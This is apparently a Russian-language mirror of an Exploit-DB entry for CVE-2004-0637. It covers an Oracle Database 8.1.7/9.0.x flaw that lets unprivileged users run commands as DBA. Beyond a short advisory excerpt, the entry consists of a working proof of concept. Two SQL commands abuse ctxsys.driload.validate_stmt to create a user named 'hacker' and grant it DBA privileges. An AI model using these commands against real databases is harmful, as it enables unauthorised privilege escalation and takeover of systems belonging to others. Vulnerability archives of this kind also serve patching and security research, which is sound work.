- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24567
- Проверка EDB
-
- Пройдено
- Автор
- ALEXANDER KORNBRUST
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2004-0637
- Дата публикации
- 2004-09-03
Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation
Код:
source: https://www.securityfocus.com/bid/11099/info
Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.
SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');- Источник
- www.exploit-db.com
